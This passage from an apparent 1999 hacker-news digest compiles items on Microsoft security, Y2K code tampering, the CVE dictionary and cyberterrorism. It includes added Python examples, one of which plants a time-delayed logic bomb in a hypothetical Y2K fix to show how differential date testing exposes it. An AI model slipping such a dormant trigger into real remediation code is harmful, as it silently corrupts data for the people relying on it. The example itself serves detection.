and claiming that no customers have been affected, the experts say. For
instance, when issuing alerts about browser bugs Microsoft usually doesn't
point out that they can occur in e-mail, Smith says.
But Smith and some of the others conceded that Microsoft's response time
has improved in the past few years. For example, Microsoft released a
workaround immediately and a patch four days later for a recent security
exploit in Internet Information Server, and "that's probably as responsive as
any company would be," McCown says.
"A quick fix may break something else," Schultze of Security-Focus says.
"They're being thorough. It may not be as quick as some people might like."
Smith says he could think of two or three problems Microsoft decided not to
fix because of disagreement on their seriousness. For instance, he says it took
Microsoft a year to change its mind and admit that it is not secure to have a
Word document embedded in an e-mail or a Web page be able to start up the
Word application. In addition, Microsoft still maintains that JavaScript
executables in e-mail shouldn't be disabled by default.
Culp denied the allegations that the company is reluctant to admit exploits or
their scope. The company's security response team is quick to address and fix
problems, monitors security mailing lists for reports and works closely with
security groups, he said.
When a vulnerability is confirmed, the company sends e-mail alerts to
customers who have asked to be put on a list at secure@microsoft.com and
others, and posts information on its security Web site at
www.microsoft.com/support and
www.microsoft.com/security/services/bulletin.asp, Culp said. Microsoft has
more than 200 full-time employees working on nothing but security, he added.
"We look into every issue that's reported," he said. "Out of those 10,000
queries and reports (received in the past year) and all the things posted to the
mailing lists, etc. there have been about 30 issues that we have needed to
provide a patch for this year," and 40 or 45 over the last 12 months, Culp said.
Only about 5 percent of the reports Microsoft gets turn out to be bona fide
security vulnerabilities, according to Culp. Many end up being problems due to
unclear documentation, incorrect implementations of the software or code, or
users not following best practices, he said.
In recent swift work, Microsoft released a security bulletin just hours after an
IE vulnerability was announced September 10, telling users how to protect
against it while a patch is developed, Culp noted.
Meanwhile, Microsoft has taken a new approach and put a Windows 2000
test server online for users to try to hack. The system has held up although it
got off to a rocky start and was down for several days after lightning hit a
router right after it was put online.
Cooper of NTBugtraq predicted that the security situation will improve for
Microsoft as consumers become more savvy and demand more security in
products.
"Certainly there's been a change in Microsoft in the last two years to do things
with far more security in mind," he said. "The reality is they're doing it to an
extent that consumers will tolerate and to an extent that consumers will
demand."
Users are content
Several users said they have no complaints with Microsoft's products or
attitude.
"From my perspective, what Microsoft is doing is right on target," said Greg
Scott, IS manager at Oregon State University's College of Business in
Corvallis.
"I want the interoperability the tools provide me so I can move things cleanly,
simply and easily between systems. And I'm willing to suffer the minor
inconvenience of having to pay more attention to security and patches," he
said. "As long as they provide patches and fixes in an appropriate timeframe,
then I'll use their products."
Another user said he likes Microsoft software specifically because of its
integration. Ty Simone, IS manager at Onsite Sycom Energy Corp., an energy
service company based in Carlsbad, California, said he's not bothered by
Microsoft's usability versus security tradeoff.
"I would much rather have the control here than have Microsoft saying 'You
can't do anything until you change something,'" he said. "For example, the
default for IE is medium. If they set it to high, until I get to that user and set it
to medium that user couldn't access the corporate intranet, much less the
Internet."
Simone also praised Microsoft for reacting swiftly and forthrightly when issues
arise, noting that Unix users don't get security bulletins e-mailed to them like
Windows users do.
Unix gets more hacks but less press than NT does, Simone says, adding that
"It's not popular to bash the little guy."
Unix, Linux, MacOS
So how do the Windows alternatives fare?
The MacOSX "add-on programs look to be just as vulnerable (as Windows) --
there are permissions problems and plenty of coding issues," Dr. Mudge of
Boston-based hacker group L0pht Heavy Industries wrote in an e-mail.
"However, a quick look would imply that the core OS might be much more
secure than NT's core components. This is most likely due to the fact that the
new MacOS's are really BSD 4.4 (Unix) and mach memory systems. Both
have been around for decades to have the kinks worked out of."
Meanwhile, open source operating systems tend to be more easily secured
than closed source ones like NT, "because there are more people doing more
work to find the holes, and it's easier for researchers to develop patches for
exploits they find," hacker Tweety Fish said.
The most secure platform "out-of-the-box" is OpenBSD because security is a
focus on the project, he said. "It is not perfect; no OS is, but with OpenBSD
you can guarantee that security is their first priority."
The favored underdog, Linux, is considered experimental at this point, but it
may end up giving NT a good run for its money, according to Winn
Schwartau, founder of Security Experts consultancy in St. Petersburg, Florida,
and author of "Information Warfare" and other books. Most of his clients, who
include governments, NATO and other multinational organizations, use Unix
now, he added.
Despite the complaints about the security in Microsoft software, Culp said
customers - including government agencies and organizations in the healthcare,
insurance and banking industries - feel comfortable using the company's
products.
And Cooper of NT Bugtraq noted that Windows is "hugely accepted, widely
deployed and largely liked" by users.
"I don't think Windows is more or less secure than some other operating
system," Cooper said. "I think that there are technologies from Microsoft that
are good; there are others that are not good; and there are others that still
need to be refined and improved, but that are still very much in demand."
But hacker Space Rogue, a member of the L0pht Heavy Industries, summed
up what he and others see as Microsoft's security challenges.
"Windows has three strikes against it, as I see it. Popular OS, weak security,
easy-to-use, oh, and it is made by MS, the company everyone loves to hate."
@HWA
29.0 Darktide Hacking Is Closed
~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by Outkast
After almost 2 years Darktide Hacking has closed its
doors. The site offered underground news, newbie help
guides, Linux documentation and more. They will be
missed. Outkast, the site's webmaster, hopes to open a
new site with a different focus soon.
Darktide Hacking
http://www.darktide.com
From the site;
The time has come for me to close down Darktide as we know it. Darktide was a blast to run,
but the time has come for me and my crew to start making an income on the Internet. I need to
have a real income, just like all of you. I could have made money with Darktide, but I will not
sell-out. I will not turn Darktide into the next AntiOnline Network. I don't want to make money
off of hacking, I have too much respect for you, the hackers, for the underground.
Darktide will be turning into a netcenter. Access to (but not limited to) many search
engines, free web-based E-mail, news, and documentation. We will still have information on
Linux, encryption, and programming (and more). We will still have everything that is on
Darktide.Com right now (but not limited to), minus the text files on hacking. You have my
word. We will continue to open the doors to information.
You, the hackers, made me. Without you, there would be no Darktide Hacking. I owe it all to
you. I just want you all to know that I will never forget the underground, and never leave the
underground behind. I hope to still see a link to Darktide on your pages, and I hope that you will
not forget about me and my crew.
What is money? Money is the root of all evil. We must handle it with care, or we will be the
next AntiOnline. What is life? Life is like a big obstacle. Every time you think your problems
might be gone, they will come right back at you. I hope that you all will make hacking your
problemless life whenever you can. I know I will, till my life ends.
I will miss it,
-Outkast (Founder of Darktide, Inc.)
More Information:
Closing time: Closed.
New site opening time: Date not known yet. We will post the opening date when we have one.
Contact
We have been getting a lot of questions sent to our contact@darktide.com E-mail box. Because
Darktide will soon be moving to a different server, that E-mail address might be down for a few days in
this upcoming week so we would like you to send questions to another address. If you would like to
contact us please use this E-mail address. darktide@interaccess.com
Or you can send us mail at:
Darktide
P.O. Box 465
Lake Forest, IL
60045
@HWA
30.0 NIPC Head Warns of Y2K Bug Fixes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by mmullin3
Michael Vatis, who heads the interagency National
Infrastructure Protection Center, has said that they
have found indications that malicious code was being
installed at the same time as Y2K fixes. The finger was
pointed at fixes done by programmers from India and
Israel as well as Ireland, Pakistan and the Philippines.
Exactly what indications were found is not made clear.
It would seem that the severity of this problem isn't
really known and that a lot of people just seem to be
guessing.
MSNBC
http://www.msnbc.com/news/317848.asp
Cyber cop warns of Y2K tampering
Evidence seen that contractors are making malicious changes
under the guise of Year 2000 repairs
REUTERS
WASHINGTON, Sept. 30 - Malicious changes to
computer code under the guise of Year 2000
software fixes have begun to surface in some U.S.
work undertaken by foreign contractors, the top
U.S. cyber cop said on Thursday.
"We have some indications that this is
happening," in a possible foreshadowing of economic and
security headaches stemming from Y2K fixes, Michael Vatis
of the Federal Bureau of Investigation told Reuters.
Vatis heads the interagency National Infrastructure
Protection Center (NIPC), responsible for detecting and
deterring cyber attacks on networks that drive U.S. finance,
transport, telecommunications and other vital sectors.
A Central Intelligence Agency officer assigned to the
NIPC said recently that India and Israel appeared to be the
most likely sources of malicious remediation of U.S.
software.
"India and Israel appear to be the countries whose
governments or industry may most likely use their access to
implant malicious code in light of their assessed motive,
opportunity and means," the CIA officer, Terrill Maynard,
wrote in the June issue of Infrastructure Protection Digest.
Beware the millennium bug repair
Significant amounts of Y2K repair is also being done for
U.S. companies by contractors in Ireland, Pakistan and the
Philippines, according to Maynard.
"But they appear among the least likely providers to
jeopardize U.S. corporate or government system integrity,
although the possibility cannot be ruled out," he wrote.
Thousands of companies in the United States and
elsewhere have contracted out system upgrades to cope with
the Y2K glitch, which could scramble computers starting Jan.
1 when 1999 gives way to 2000.
The CIA declined comment on Maynard's article.
Referring to it, Vatis said: "This is our effort to put out in the
public information that hopefully can be useful to people."
Vatis, interviewed in his 11th floor office at FBI
headquarters, said that so far not a great deal of
Y2K-related tampering had turned up. "But that's largely
because, number one, we're really dependent on private
companies to tell us if they're seeing malicious code being
implanted in their systems," he said.
In reporting evidence of possible Y2K-related sabotage
of software, Vatis confirmed one of the worst long-term
fears of U.S. national security planners.
"A tremendous amount of remediation of software has
been done overseas or by foreign companies operating within
the United States," Vatis said.
He said it was "quite easy" for an outsider to code in
ways of gaining future access or "causing something to
detonate down the road."
This could expose a company to future denial of service
attacks, open it to economic espionage or leave it vulnerable
to malicious altering of data, Vatis said.
The Special Senate Y2K committee, in its final report
last week, described the issue as unsettling.
"The effort to fix the code may well introduce serious
long-term risks to the nation's security and information
superiority," said the panel headed by Robert Bennett,
Republican of Utah, and Chris Dodd, Democrat of
Connecticut.
The panel said the long-term consequences could
include:
Increased foreign intelligence collection
Increased espionage activity
Reduced information security
Loss of economic advantage
Increase in infrastructure vulnerability
Vatis, in testimony before the Y2K panel in July, warned
that contractors could compromise systems by installing trap
doors for anonymous access.
By implanting malicious code, he said, a contractor could
stitch in a logic bomb or a time-delayed virus that would
later disrupt operations. Another threat was insertion of a
program that would compromise passwords or other system
security, he said.
© 1999 Reuters Limited. All rights reserved.
Republication or redistribution of Reuters content is
expressly prohibited without the prior written consent of
Reuters.
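The practical check a practitioner wants after reading the above is how a dormant, time-delayed change hides inside an otherwise correct Y2K fix, and why acceptance tests confined to the 1999/2000 rollover never see it. The following is an added example, not code from the Reuters story, from NIPC or from any contractor. The "delivered" fix is hypothetical: it implements the standard two-digit-year windowing remediation correctly, then carries a logic bomb of the kind Vatis describes that only fires once a simulated clock passes a trigger date. The defence shown is a differential sweep: the delivered code is compared against an independently written reference across every two-digit year and a wide range of simulated clock values, well past the rollover that the contractor was paid to fix. The pivot year, the trigger date and the corruption the bomb applies are all assumptions chosen for illustration.

```python
"""Differential date sweep for a Y2K remediation delivered by a third party.

Added example, not code from the Reuters story or from NIPC. The contractor's
'fix' below is hypothetical: it carries a dormant logic bomb of the kind Vatis
describes, and the sweep shows why acceptance tests confined to the 1999/2000
rollover would never see it."""
import datetime as dt

PIVOT = 50  # windowing pivot (assumed): 00-49 -> 2000-2049, 50-99 -> 1950-1999


def window_year(yy: int) -> int:
    """Reference implementation of the standard Y2K windowing fix for a
    two-digit year field. Written independently of the delivered code and
    used as the oracle in the sweep."""
    if not 0 <= yy <= 99:
        raise ValueError("expected a two-digit year")
    return (2000 if yy < PIVOT else 1900) + yy


def delivered_window_year(yy: int, clock: dt.date) -> int:
    """Hypothetical delivered fix. Identical to window_year during the
    acceptance-test period; after the trigger date a time-delayed branch
    shifts every two-digit year >= 90 by a century, silently corrupting
    date arithmetic downstream."""
    if not 0 <= yy <= 99:
        raise ValueError("expected a two-digit year")
    year = (2000 if yy < PIVOT else 1900) + yy
    if clock >= dt.date(2001, 4, 1) and yy >= 90:  # dormant for ~15 months
        year += 100
    return year


def differential_sweep(delivered, reference, start: dt.date, end: dt.date,
                       step_days: int = 30):
    """Feed every two-digit year to both implementations under simulated
    clock values from start to end; return the first divergence found, or
    None. The clock is an explicit parameter so the sweep never depends on
    the real system date and can be pushed arbitrarily far into the future."""
    clock = start
    while clock <= end:
        for yy in range(100):
            got, want = delivered(yy, clock), reference(yy)
            if got != want:
                return {"clock": clock, "yy": yy, "got": got, "want": want}
        clock += dt.timedelta(days=step_days)
    return None


def acceptance_window_check():
    """What a typical Y2K acceptance test covered: the months around rollover.
    Returns None, i.e. the delivered code looks clean."""
    return differential_sweep(delivered_window_year, window_year,
                              dt.date(1999, 6, 1), dt.date(2000, 6, 30))


def extended_sweep_check():
    """The same comparison pushed years past rollover, where the bomb fires.
    Returns the first divergence (clock, input, got, want)."""
    return differential_sweep(delivered_window_year, window_year,
                              dt.date(1999, 6, 1), dt.date(2005, 12, 31))


if __name__ == "__main__":
    print("acceptance window:", acceptance_window_check())
    print("extended sweep:   ", extended_sweep_check())
```

The lesson is in the two calls at the end: the rollover-only sweep passes, and only the sweep that keeps advancing the simulated clock turns up the divergence. Any remediation received from an outside party should be exercised against an independent oracle under a controllable clock, for the full range of dates the code will live through, not just the dates the contract was about.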
@HWA
31.0 Better Computer Security Needs More Than Just Laws
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by Code Kid
In testimony before a Congressional committee
yesterday, federal and industry experts said that while
enhancements to the twelve-year-old Computer Security
Act are needed, laws alone are not going to fix the
underlying security issues on the Internet. Increasing
the role of the National Institute of Standards and
Technology in establishing security guidelines for federal
agencies would be one of the goals of the Computer
Security Enhancement Act of 1999.
Federal Computer Week
http://www.fcw.com:80/pubs/fcw/1999/0927/web-security-9-30-99.html
SEPTEMBER 30, 1999 . . . 17:18 EDT
Law is only part of better computer security,
Congress told
BY DIANE FRANK (diane_frank@fcw.com)
Federal agencies would benefit greatly from a proposed enhancement to a
12-year-old computer security law, but legislation alone cannot solve some
underlying information security problems, federal and industry experts told
Congress today.
The Computer Security Enhancement Act of 1999 would increase the role and
resources of the National Institute of Standards and Technology by establishing
security guidelines that federal agencies could follow.
The bill would beef up the Computer Security Act, which requires civilian
agencies to protect computer systems. The Computer Security Enhancement
Act passed the House last year but failed to move in the Senate.
The bill will not necessarily make federal computers safer, said Raymond
Kammer, director of NIST. Agencies must understand that the responsibility for
securing computers and transactions starts with agencies and that they must put
in place steps to meet those demands, he said.
"Only they can decide how valuable the data is and then how to protect it,"
Kammer said. The act also would provide additional resources to NIST for
funding security scholarships and internships for students, part of a solution to
the growing shortage of security professionals within government and industry.
"You can't help [ease] this [IT worker shortage] by bringing in immigrants," said
Harris Miller, president of the Information Technology Association of America.
"You can't outsource this to another country. We need to have specialists in this
country."
@HWA
32.0 New NT Security List Started
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by Weld Pond
A new mailing list devoted to NT Security that promises
to be completely full disclosure has been started. The
new list, NT Security Advice, will be moderated by
Steve Manzuik and is open to anyone interested in,
or working with Microsoft Windows NT and Security.
TO SUBSCRIBE: Send an email to
maillist@ntsecadvice.com
@HWA
33.0 Computer Security Dictionary Released
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by no0ne
MITRE Corporation has recently unveiled the first public
dictionary of computer vulnerabilities, "in order to boost
cyber-defense". "Common Vulnerabilities and Exposures"
(CVE) contains standardized names and descriptions of
more than 300 known security vulnerabilities and
exposures, making it easier to share data among the
various vulnerability databases and security tools.
Computer World
http://www.computerworld.com/home/news.nsf/all/9909293cved
Mitre unveils security 'dictionary'
By Kathleen Ohlson
In an effort to find common ground for different vulnerability
databases and security tools, the Mitre Corp. today rolled
out its Common Vulnerabilities and Exposures (CVE) effort.
The CVE is a public dictionary that consists of standard
names and descriptions for more than 300 security
vulnerabilities and exposures. Common names will allow
data to cross separate databases and tools, officials said.
Based in Bedford, Mass., Mitre is an independent, nonprofit
company offering technical support to the government. It
developed the list with 19 security organizations, including
Cisco Systems Inc., Internet Security Systems and the
CERT Coordination Center at Carnegie Mellon University,
that make up the CVE Editorial Board.
Related story:
Mitre to announce security 'dictionary', Sept. 28, 1999
http://www.computerworld.com/home/news.nsf/all/9909282mitre
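The point of a common name is that two tools which call the same issue by different local identifiers can still be correlated. The following added example (not MITRE's code and not from the Computerworld story) shows what that correlation needs in practice: a validator that accepts the CVE name syntax (including the legacy CAN- candidate prefix and the longer sequence numbers allowed since 2014), normalizes case, rejects malformed names, and then joins two scanner reports on the normalized name. The two reports are constructed sample data; the tool-local identifiers are made up, and the CVE numbers in them are used only as join keys, not as claims about what those dictionary entries describe.

```python
"""Correlating findings from two tools by CVE name.

Added example, not MITRE's code or from the Computerworld story. The finding
lists are constructed sample data: the tool-local identifiers are made up and
the CVE numbers serve only as keys, not as claims about those entries."""
import re

# CVE name syntax: CVE-<four-digit year>-<sequence>. The 1999 dictionary used
# four-digit sequences; since 2014 the sequence may be longer. Candidate
# entries once carried a CAN- prefix, which a correlator still has to accept.
_CVE_NAME = re.compile(r"^(?P<prefix>CVE|CAN)-(?P<year>\d{4})-(?P<seq>\d{4,})$",
                       re.IGNORECASE)


def normalize_cve(name: str):
    """Return the canonical 'CVE-YYYY-NNNN' form of a name, or None if the
    string is not a well-formed CVE/CAN name. Leading zeros in the sequence
    are part of the name (CVE-1999-0067 is not CVE-1999-67), so they are kept."""
    m = _CVE_NAME.match(name.strip())
    if not m:
        return None
    year, seq = m.group("year"), m.group("seq")
    if int(year) < 1999:  # no names predate the dictionary
        return None
    return f"CVE-{year}-{seq}"


def correlate(*tool_reports):
    """tool_reports: (tool_name, [(local_id, cve_reference), ...]).
    Returns ({cve: {tool: local_id}}, [unmatched findings]). A finding with
    no valid CVE name cannot be correlated and is reported separately rather
    than silently dropped."""
    by_cve, unmatched = {}, []
    for tool, findings in tool_reports:
        for local_id, ref in findings:
            cve = normalize_cve(ref) if ref else None
            if cve is None:
                unmatched.append((tool, local_id, ref))
                continue
            by_cve.setdefault(cve, {})[tool] = local_id
    return by_cve, unmatched


# Constructed sample reports: two scanners naming the same issues differently.
SCANNER_A = ("scanner-a", [
    ("A-0101", "CVE-1999-0067"),
    ("A-0102", "can-1999-0080"),   # legacy candidate prefix, lowercase
    ("A-0103", "vendor-bug-42"),   # no CVE reference: cannot be correlated
])
SCANNER_B = ("scanner-b", [
    ("B-7", "CVE-1999-0067"),
    ("B-8", "CVE-1999-0080"),
    ("B-9", "CVE-1999-0500"),      # only one tool reports this one
])


def overlap():
    """CVE names reported by both tools, in sorted order."""
    by_cve, _ = correlate(SCANNER_A, SCANNER_B)
    return sorted(c for c, tools in by_cve.items() if len(tools) == 2)


if __name__ == "__main__":
    matched, unmatched = correlate(SCANNER_A, SCANNER_B)
    for cve, tools in sorted(matched.items()):
        print(cve, tools)
    print("unmatched:", unmatched)
```

Two details matter when doing this for real: normalization must not strip the zero padding, because the padded sequence is the name, and findings that carry no valid CVE reference should surface as unmatched rather than disappear, since those are exactly the gaps the dictionary is meant to expose.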
@HWA
34.0 CyberWarfare - Real or Imagined?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by Lady Sharrow
An interesting article from the free section of Jane's
Intelligence Monthly. It is quite long, and most of it
concerns the use of physical mass-destruction weapons
(chemical, biological, radiological and nuclear) by
terrorist organizations, but the same analysis of
motivation, funding and capability is also applied to
cyber warfare. It is talking about 'serious' use of these
weapons rather than the average web page
defacement.
Janes Intelligence Monthly
http://jir.janes.com/sample/jir0499.html
Document created: 21 SEPTEMBER 1999
Cyberwarfare: fact or fiction?
Now that cyberwarfare has become an accepted fact, Joshua Sinai examines the
requirements for anti-state groups to employ this and chemical, biological,
radiological and nuclear weaponry.
As the 21st century approaches, there is great concern in worldwide national
security circles about preparations by terrorist groups, either on their own or
jointly with state sponsors, to exploit the increasing availability of sophisticated
lethal technologies to launch mass destruction and mass disruption warfare
against their enemies' populations and critical infrastructures. Mass destruction
warfare utilises chemical, biological, radiological and nuclear (CBRN) weaponry,
whereas cyber terrorism utilizes information technology (IT) devices to inflict
mass disruption of an opponent's critical IT infrastructure. The concern about the
likelihood of CBRN/Cyber terrorist attacks is driven by the emergence of new
types of terrorist groups which possess the motivation and technical capability to
launch such attacks, and particularly a power drive by their leaders to propel their
groups on the international arena as a first order of magnitude technological
destroyer and menace.
Only a select number of terrorist groups and few state sponsors are likely to
possess the necessary motivation and capability in the spheres of organisation,
funding, acquisition, technology, storage and stockpiling, logistics, and other
overt and covert resources to be able to make the transition from conventional to
CBRN/Cyber warfare. For many, the numerous internal and external tasks and
hurdles involved in acquiring, storing and deploying such sophisticated weaponry
and devices are simply too much. Moreover, few terrorist groups and state
sponsors are sufficiently motivated to carry out mass casualty or mass disruption
warfare. For many, small scale conventional attacks such as car or truck
bombings cause sufficient death and destruction to achieve the objective of
terrorising a targeted population and its government in order to compel them to
pay attention or make concessions to an insurgent's cause and grievances.
Nevertheless, there is sufficient reporting of activities by terrorist groups and their
state sponsors in the CBRN/Cyber realm to provide the necessary indications
and warning (I&W) indicators to usher in a new paradigm of super, ultra, and
macro-type catastrophic terrorism. For terrorists, CBRN/Cyber weapons provide
the opportunity to cause death and disruption at unprecedented levels - resulting
in thousands of casualties and billions of dollars in damages to critical
infrastructure nodes. However, depending on the levels of sophisticated
technologies deployed, acquiring a CBRN/Cyber capability requires extensive
funding, an overt or covert acquisition capability, a technological research and
development program to produce, weaponise and stockpile CBRN materiel (or the
capability to purchase or steal ready-made weapons), and a level of technical
expertise and logistical infrastructure that is appropriate to launch successful
CBRN attacks. This is beyond the technical capability or motivation of most
terrorist groups.
On the other hand, the information revolution ushered in by the Internet allows
terrorists to access articles and documents from the World Wide Web about the
manufacture or acquisition of BW or CW agents, and commercial-off-the-shelf
(COTS) software products can easily be obtained to conduct cyberterrorism,
making CB/Cyber attacks much more feasible to launch than hitherto.
Radiological and nuclear weapons, however, are far more difficult for terrorist
groups to acquire or to develop indigenously, to weaponise and deploy, or to
provide storage for.
Although such cost/benefit considerations may limit the majority of terrorist
operations to the realm of conventional warfare in the 21st century, recent WMD-
related events and reports indicate increasing activity by certain terrorist groups
and state sponsors in the CBRN/Cyber arena. This has been accompanied by a
lowering of the threshold for their conviction that conventional attacks are
insufficiently effective and that a more lethal form of mass casualty or mass
disruption violence is required to achieve their goals.
Thus, the primary differences between conventional and CBRN/Cyber terrorism lie
in the areas of motivation, organisation, funding, and capability in the realms of
acquisition, technology, and logistics. There is also the issue of the capability to
overcome external hurdles. These include acquisition of the necessary
technologies, cooperation by foreign suppliers, creation of a logistics network for
acquisition and deployment, obtaining state sponsorship, and also detection,
penetration, and deterrence by foreign intelligence and counterterrorism
agencies.
There have already been several instances of CBRN/Cyber operations by terrorist
groups. Chemical attacks have been mounted by the Aum Shinrikyo cult, such
as the March 1995 sarin nerve gas attack on the Tokyo subway system, killing
12 people and injuring 5,500. Chemical cyanide was included with explosives in
the February 1993 bombing attack by Islamic militants of the World Trade
Center. In the mid-1980s, the Tamil secessionist group, LTTE (which provides its
operatives with a cyanide pill in the event of capture) threatened to carry out a
BW attack by spreading pathogens to infect humans and crops in Sri Lanka.
Aum Shinrikyo also attempted, albeit unsuccessfully, on at least 10 occasions to
disperse biological warfare agents in aerosol form, and in October 1992 its
members attempted to acquire Ebola virus samples in then Zaire for future use in
biological attacks. In mid-1997, an American white supremacist faction plotted to
attack the New York City subway system with biological weapons. Reportedly,
Hizbullah and Hamas operatives have acquired chemical and biological
components, although they have so far refrained from carrying out such attacks.
Until its top leaders were arrested, some members of the Aum group also studied
uranium enrichment and laser technology which are necessary for acquiring the
capability to develop nuclear weapons. The group had one or possibly more of its
followers on the staff of the Russian Kurchatov Institute's nuclear physics
laboratory. In September 1998, Mamdouh Mahmud Salim, a top aide to Osama
Bin Laden was arrested in Munich while trying to procure enriched uranium for
developing nuclear weapons.
One of the first known instances of cyberterrorism occurred in 1997 when the
LTTE launched cyber attacks against Sri Lankan government sites, including
hacking into a government web site and altering it to transmit their own political
propaganda. Supporters of the Mexican Zapatista rebels have jammed Mexican
government web sites. The American terrorist group, the Christian Patriot
movement, is active on the Internet. The Osama Bin Laden group utilises an
extensive network of computers, disks for data storage, and Internet for e-mail
and electronic bulletin boards to exchange information. Hamas operatives in the
Middle East and elsewhere use Internet chat rooms and e-mail to coordinate
activities and plan operations. Other Middle Eastern terrorist groups, such as
Lebanon's Hizbullah and Algeria's Armed Islamic Group, also utilise computers
and the Internet for communications and propaganda.
Terrorists have also targeted critical infrastructure. Thus, for example, in the
Summer of 1998, the LTTE bombed state-owned and private telecommunications
facilities in Sri Lanka, damaging buildings and disrupting telephone service.
Motivation
Motivation concerns the psychological, political and strategic factors that are
likely to serve as incentives or disincentives for terrorist groups to resort to
CBRN/Cyber warfare, particularly the decision to embark on a higher lethality and
disruption in targeting. Motivations are an important factor because they influence
a group's destructive or disruptive potential and the paths and links that they are
likely to pursue to acquire the necessary technological and operational
capabilities to launch CBRN/Cyber attacks. It is important to assess these
motivations because a misunderstanding of a terrorist group's decision making
regarding CBRN/Cyber warfare could lead to underestimating or overestimating a
group's CBRN/Cyber capability, surprises about unanticipated attacks, the types
of weapons chosen, the timeframe for such attacks, and likely targets.
The psychological factors that are likely to drive terrorist groups to embark on
CBRN/Cyber warfare might be irrationally or rationally based. Thus, irrational
factors might be characterised as leadership by extremist, paranoid or criminally
insane border-line personalities, who are driven by a suicidal 'culture of death'. On
the other hand, rationally-based factors would include a need for the great
prestige and power that such weapons would provide or the pursuit of
mass-casualty type vengeance against particularly repressive government
policies or excessively harsh government retaliation. Both types of psychological
actors tend to be authoritarian, and, although the latter type might behave like
rational actors, both types reject commonly accepted societal norms, standards
or proportions that would make them less inclined to exceed a certain violence
and mass casualty threshold, and thus they would be more prone to commit
catastrophic violence and disruption.
The political factors that would motivate terrorist groups to resort to catastrophic
warfare range from particular to broad grievances against a perceived enemy
state, sub-state actors or transnational organisations, and their objectives vary
from revolution, secession for a religious, ethnic or national community, to
nihilism and the complete destruction of a state. A second set of political factors
that are particularly susceptible to a lack of conventional constraints on
catastrophic violence are religious beliefs that advocate visions of apocalyptic
millennialism, messianic apocalypse or redemptiveness, in which CBRN/Cyber
type violence is employed to hasten a new millennium, the arrival of a messiah,
or a new order. This is particularly the case with messianic groups such as Aum
Shinrikyo which view the society that they seek to destroy as inherently
worthless and offer their adherents a path to a higher existence through rebirth in
the next life. A third set of political factors includes virulent racist or ethnic
hatreds by terrorist groups, the resolution of which they believe would be achieved by
the destruction or annihilation of the enemy community.
Strategy vis-à-vis CBRN/Cyber warfare concerns how a terrorist group's
leadership defines its broad objectives and the means and targets necessary for
their attainment. For example, a terrorist group that is inclined towards a strategy
of minimising risk or failure, of using violence to influence, but not destroy an
opponent, is concerned about backlash within its own community or intended
audience, and fears massive military retaliation by a foreign state against its own
group and supporting community, might be more likely to adopt tactics that call
for conventional warfare, whereas a group whose strategy is unconstrained by
these factors might be more likely to pursue the CBRN/Cyber catastrophic
option. Thus, an extremist religious terrorist group that regards violence as a
sacramental act or divine duty, and the constituency of which is limited to its own
group, would likely be unconstrained to employ the most lethal violent means at
its disposal. A further strategic objective might be to carry out or threaten to carry
out a CBRN/Cyber attack in order to perpetrate an economic extortion or to
massively damage a critical infrastructure node, such as a food supply. Another
strategic consideration concerns the decision whether or not to seek state
sponsorship and assistance in CBRN/Cyber warfare. A final consideration is
whether the group needs to claim credit for a CBRN/Cyber attack. In fact, the
reduced need to claim credit for such attacks signals the emergence of the
"silent terrorists," and is another factor contributing to loosening self-imposed
constraints against higher levels of lethality.
Organization
There are no fixed organisational prerequisites for attaining CBRN/Cyber
capability, particularly in the age of the Internet when terrorist operatives can be
dispersed geographically yet are able to communicate with each other by using
their own secured communications networks. At one end of the organisational
spectrum, the technological complexities involved in acquiring CBRN/Cyber
capability require a well organised, hierarchical organisation, with a command
and control apparatus staffed by professional terrorists, a highly-developed R&D
apparatus staffed by scientists and technicians, production and storage facilities,
a transnational logistics network to clandestinely acquire the necessary
technology from external sources, and business activities (either legitimate or
illegitimate) to generate the necessary income to fund the acquisition of
CBRN/Cyber operational capability.
At the other end of the organisational spectrum, a CBRN/Cyber operational
capability might be acquired by a terrorist entity of a transitory, ad hoc
amalgamation that bands together for a single mission, that is less cohesive and
more diffuse organizationally, and is staffed by a small number of professional
operatives and amateur associates. In addition, such groups, such as the Osama
Bin Laden network, do not generally operate out of geographically bound
sanctuaries or safe-havens and their activities are not confined to specific
operational areas, but are dispersed worldwide. The use of amateurs by
professional terrorists is significant because these can be used as pawns, cut-outs
or expendable minions to conceal the identity of the particular organisation
or state sponsor that actually orders or commissions a CBRN/Cyber attack. In
such a case, CBRN/Cyber warfare would be carried out by an organizationally ad
hoc terrorist entity, backed by a state sponsor, that joins forces for a specific
one-time operation.
A related organisational issue is the degree of technical and military
professionalization required by terrorist groups to conduct CBRN/Cyber warfare,
or whether amateurs can develop such capability, particularly when aided by a
state sponsor. Thus, to pursue the CBRN/Cyber warfare option, do terrorist
groups need to recruit individuals with technical degrees and expertise in
disciplines such as chemistry, biology, physics, engineering and computer
science? Moreover, does a group need to organise the training on its own or is a
state sponsor required to provide instruction and facilities?
A terrorist group might also train its members in not just a single weapon but a
variety of CBRN/Cyber weapons for which different sets and levels of
technological expertise are required in order to attain operational capability in
each of these weapons. Thus, for example, terrorist groups, such as Aum
Shinrikyo, have provided their members with extensive training and education in a
variety of CBRN/Cyber weapons, including studying uranium enrichment and
laser technology, with at least one of their members working on the staff of a
Russian nuclear physics laboratory, while another contingent traveled to Africa to
study the Ebola virus. Cyberwarfare involves a different set of training
requirements that is also more readily available. Thus, training in computer
science is now widely prevalent among terrorist groups.
Funding
Significant financial resources are required for terrorist groups to develop an
indigenous CBRN/Cyber operational capability unless a group succeeds in
weaponising a crude, low-technology device, or stealing or hijacking such a
device. In general, a range of costs are involved in acquiring, operationalizing,
stockpiling and deploying CBRN/Cyber weapons of varying levels of
sophistication and lethality. As a result, financial considerations play a role in
deciding whether a group will choose single or multiple CBRN/Cyber weapons,
the types of dispersal systems, and whether these weapons will be indigenously
developed, obtained from an external source (whether legally or through
smuggling, hijacking or theft), or are provided by a state sponsor. CBRN/Cyber
weapons for use in terrorist attacks vary greatly in their cost. For example,
acquiring production and operational capability to deploy chemical, biological,
radiological, or cyber capability involves relatively small financial resources, and
are within the means of many terrorist groups. Far more significant financial
